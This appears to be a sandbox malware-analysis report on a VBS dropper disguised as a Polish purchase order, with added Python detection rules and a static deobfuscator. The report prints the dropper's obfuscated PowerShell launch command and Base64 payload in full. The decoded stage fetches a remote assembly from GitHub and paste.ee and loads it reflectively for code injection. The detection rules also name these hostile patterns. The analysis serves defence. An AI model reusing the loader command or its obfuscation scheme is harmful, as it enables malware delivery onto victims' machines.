Windows Analysis Report
Nowe zam#U00f3wienie Roltop.vbs

Overview

General Information

Sample name: Nowe zam#U00f3wienie Roltop.vbs
renamed because the original name contains a non-ASCII character (ó, encoded here as #U00f3)
Original sample name: Nowe zamówienie Roltop.vbs (Polish: "New order Roltop")
Analysis ID: 1522478
MD5: 4f593177d0dc7f47a74a20f8d75dacfc
SHA1: ec4b127fabf32ce159ae4a093ea30e6f3a85d085
SHA256: c2110d453b7db8bcde1826f213136da46caec8dba656ccad721ad7cb066197f8
Tags: vbs, user-adam_zbadam

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
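The detections above map onto a small set of process-creation conditions: a script host running a script file, the script host spawning PowerShell, FromBase64String and a long Base64 literal in the command line, -executionpolicy bypass together with a hidden window, and the wscript.exe -> powershell.exe -> powershell.exe chain. The Python below is an added example written for this page, not part of the Joe Sandbox report, that evaluates those conditions over constructed Sysmon-style events modelled on the process tree in the report. The PIDs, the explorer.exe parent, the benign control event and the truncated Base64 literal are constructed, and each rule is a plausible rendering of the signature title, not the vendor's actual logic.

```python
"""Detection logic for the execution chain in this report, run over constructed
process-creation events (Sysmon Event ID 1 style fields)."""
import ntpath
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"

# Constructed events modelled on the report's process tree. Command lines follow
# the report; PIDs, the explorer.exe parent, the benign control event and the
# "..."-truncated Base64 literal (cut at the prefix the AMSI capture shows) are made up.
EVENTS = [
    {"ProcessId": 7400, "ParentProcessId": 1234, "ParentImage": EXPLORER, "Image": WSCRIPT,
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"'},
    {"ProcessId": 7492, "ParentProcessId": 7400, "ParentImage": WSCRIPT, "Image": PS,
     "CommandLine": f'"{PS}" -command $Codigo = \'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6Jys...\';'
                    "$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));"
                    "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"},
    {"ProcessId": 7500, "ParentProcessId": 7492, "ParentImage": PS, "Image": CONHOST,
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 7520, "ParentProcessId": 7492, "ParentImage": PS, "Image": PS,
     "CommandLine": f'"{PS}" -windowstyle hidden -executionpolicy bypass -NoProfile -command'},
    # Benign control: an admin script started from Explorer should trigger nothing.
    {"ProcessId": 8000, "ParentProcessId": 1234, "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": f'"{PS}" -NoProfile -File C:\\Scripts\\inventory.ps1'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")      # long Base64 literal anywhere in the line
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (ntpath so it works off-Windows too)."""
    return ntpath.basename(path).lower()


def rule_script_host_runs_script_file(e):
    return image_name(e["Image"]) in SCRIPT_HOSTS and \
        re.search(r"\.(?:vbs|vbe|js|jse|wsf|wsh|vba)\b", e["CommandLine"], re.I) is not None


def rule_script_host_spawns_shell(e):
    return image_name(e["ParentImage"]) in SCRIPT_HOSTS and image_name(e["Image"]) in SHELLS


def rule_frombase64string(e):
    # Case-insensitive on purpose: the sample writes "Frombase64String".
    return image_name(e["Image"]) in POWERSHELL and "frombase64string" in e["CommandLine"].lower()


def rule_base64_command(e):
    cl = e["CommandLine"]
    return image_name(e["Image"]) in POWERSHELL and (ENC_FLAG.search(cl) or B64_TOKEN.search(cl)) is not None


def rule_insecure_execution_policy(e):
    # -ep / -ex / -exec / -executionpolicy are all accepted by powershell.exe.
    return re.search(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)", e["CommandLine"], re.I) is not None


def rule_hidden_window(e):
    return image_name(e["Image"]) in POWERSHELL and \
        re.search(r"-w(?:indowstyle)?\s+hidden", e["CommandLine"], re.I) is not None


RULES = [
    ("Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript", rule_script_host_runs_script_file),
    ("Sigma detected: WScript or CScript Dropper", rule_script_host_spawns_shell),
    ("Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet", rule_frombase64string),
    ("Sigma detected: Base64 Encoded PowerShell Command Detected", rule_base64_command),
    ("Sigma detected: Change PowerShell Policies to an Insecure Level", rule_insecure_execution_policy),
    ("Suspicious powershell command line found", rule_hidden_window),
]

SUSPICIOUS_CHAIN = ["wscript.exe", "powershell.exe", "powershell.exe"]


def evaluate(events) -> dict:
    """Map each ProcessId to the set of rule titles that fire on its event."""
    return {e["ProcessId"]: {title for title, check in RULES if check(e)} for e in events}


def ancestry(event, by_pid) -> list:
    """Image names from the oldest known ancestor down to the event itself."""
    chain, cur, seen = [], event, set()
    while cur is not None and cur["ProcessId"] not in seen:   # guard against PID-reuse loops
        seen.add(cur["ProcessId"])
        chain.append(image_name(cur["Image"]))
        cur = by_pid.get(cur["ParentProcessId"])
    return chain[::-1]


def suspicious_chains(events, pattern=SUSPICIOUS_CHAIN) -> list:
    """Return every ancestry that contains `pattern` as a contiguous run."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(e, by_pid)
        if any(chain[i:i + len(pattern)] == pattern for i in range(len(chain) - len(pattern) + 1)):
            hits.append(chain)
    return hits


if __name__ == "__main__":
    for pid, titles in evaluate(EVENTS).items():
        print(pid, sorted(titles))
    print("chains:", suspicious_chains(EVENTS))
```

The per-event rules fire on the first powershell.exe (dropper, FromBase64String, Base64 literal, bypass, hidden) and on the second (bypass, hidden) but stay silent on conhost.exe and on the control event; the chain check is what ties the three processes together, which is how a SIEM correlation would replace a pile of single-event alerts with one incident.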

Classification


Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: powershell.exe, 00000001.00000002.1687086787.000002650009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1684912323.000001E73D447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1687086787.0000026500057000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.1687086787.000002650006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1684912323.000001E73D47F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1684912323.000001E73D447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1691192012.000002656C9B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co

System Summary

Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: Nowe zam#U00f3wienie Roltop.vbs Initial sample: strings longer than 50 characters found
Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal92.expl.evad.winVBS@6/6@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nml5pgt.nzl.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1691192012.000002656C9B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb1 source: powershell.exe, 00000001.00000002.1690455662.000002656AB21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691778965.000002656CBD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbl source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb9 source: powershell.exe, 00000001.00000002.1690455662.000002656AB21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Qib.pdbB source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
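Decoding the -command argument shown in the process tree above: the Base64 $Codigo blob decodes to a second script that is itself one long single-quoted string assembled from '+' concatenations, with the characters $, " and ' swapped for the tokens HZT, 4dM and tpa. The tail of that script restores them with -replace 'HZT',[CHaR]36, -replace '4dM',[CHaR]34 and -creplace 'tpa',[CHaR]39, then pipes the result into an Invoke-Expression alias spelled from $PSHOME characters ($psHoME[21]+$pshOME[34]+'X' is 'ieX' when $PSHOME is C:\Windows\System32\WindowsPowerShell\v1.0, the directory this report shows). The recovered stage downloads raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt, Base64-decodes it, loads it with [Reflection.Assembly]::Load and calls [dnlib.IO.Home]::VAI with a reversed paste.ee URL, three "desativado" arguments and "AddInProcess32", which fits the 'Creates a process in suspended mode (likely to inject code)' signature; the last arguments of that call are garbled in this capture and are not reconstructed here. The Python below is an added static deobfuscator written for this page, not part of the report or of the sample. It embeds the intact head and tail of the blob verbatim and omits the garbled middle, and it treats the reversed-URL reading as an analyst inference rather than something the PowerShell stage does itself.

```python
"""Static deobfuscation of the two-layer PowerShell stage launched by the VBS.

Layer 1: the -command argument carries a Base64 blob ($Codigo) that the first
powershell.exe decodes with FromBase64String and hands to a second powershell.exe.
Layer 2: the decoded text is one single-quoted string built from '+' fragments,
with $ " ' replaced by tokens that -replace 'TOKEN',[CHaR]NN restores at run time,
piped into an Invoke-Expression alias spelled from $PSHOME characters.
"""
import base64
import re

# HEAD_B64 and TAIL_B64 are copied verbatim from the blob in the process tree above.
# The middle of the blob is garbled in this capture, so it is omitted and the two
# intact fragments are decoded separately.
HEAD_B64 = (
    "KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysn"
    "bnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRz"
    "L21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24n"
    "Kyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQn"
    "KycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysn"
    "PSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4n"
    "KydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScr"
    "J2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24n"
    "Kyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0"
    "JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRk"
    "TWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRk"
    "TUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMy"
)
TAIL_B64 = (
    "IC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2Ug"
    "J3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ=="
)

# $PSHOME of the interpreter the report shows (64-bit Windows PowerShell 5.1).
PSHOME_51 = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def decode_layer1(blob: str) -> str:
    """Mirror [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...))."""
    return base64.b64decode(blob).decode("utf-8")


def collapse_concatenation(ps: str) -> str:
    """Join 'a'+'b' fragments back into one literal (the payload is all single-quoted)."""
    return ps.replace("'+'", "")


def parse_replace_table(ps: str) -> list:
    """Collect (token, replacement_char, case_sensitive) from -replace/-creplace 'TOK',[CHaR]NN."""
    table = []
    for m in re.finditer(r"-(c?)replace\s+'([^']+)'\s*,\s*\[char\]\s*(\d+)", ps, re.I):
        table.append((m.group(2), chr(int(m.group(3))), m.group(1).lower() == "c"))
    return table


def apply_replace_table(ps: str, table) -> str:
    """-replace is a case-insensitive regex replace, -creplace a case-sensitive one."""
    for token, char, case_sensitive in table:
        ps = re.sub(re.escape(token), lambda _m, c=char: c, ps, flags=0 if case_sensitive else re.I)
    return ps


def resolve_invoked_command(tail: str, pshome: str = PSHOME_51) -> str:
    """Spell out the cmdlet name built from $PSHOME characters after the final pipe."""
    expr = tail.rsplit("|", 1)[-1]
    pieces = []
    for m in re.finditer(r"\$pshome\[(\d+)\]|'([^']*)'", expr, re.I):
        pieces.append(pshome[int(m.group(1))] if m.group(1) is not None else m.group(2))
    return "".join(pieces)


def extract_iocs(script: str) -> dict:
    urls = re.findall(r"https?://[^\s'\"]+", script)
    quoted = re.findall(r'"([^"]+)"', script)
    # Analyst inference: a quoted argument that reads as a URL backwards is recorded reversed.
    reversed_urls = [s[::-1] for s in quoted if s[::-1].lower().startswith("http")]
    return {"urls": urls, "reversed_urls": reversed_urls, "quoted_args": quoted}


def deobfuscate(head_b64: str = HEAD_B64, tail_b64: str = TAIL_B64) -> dict:
    head = collapse_concatenation(decode_layer1(head_b64))
    tail = decode_layer1(tail_b64)
    # The wrapper is (('<payload>') -rEPLaCe ... )| . (<iex>); drop the opening ((' here.
    payload = head[len("(('"):] if head.startswith("(('") else head
    table = parse_replace_table(tail)
    result = extract_iocs(apply_replace_table(payload, table))
    result["replace_table"] = table
    result["invoked_via"] = resolve_invoked_command(tail)
    result["script"] = apply_replace_table(payload, table)
    return result


if __name__ == "__main__":
    r = deobfuscate()
    print(r["script"])
    print("replace table:", r["replace_table"])
    print("invoked via:", r["invoked_via"])
    print("URLs:", r["urls"], "reversed:", r["reversed_urls"])
```

Only the two Base64 fragments are sample-specific; the replace-table parsing, the $PSHOME index resolution and the concatenation collapse apply to any sample of this loader pattern, so the same functions can be pointed at the next $Codigo blob without reading its thousands of '+' fragments by hand.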

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6Jys", "0", "false");
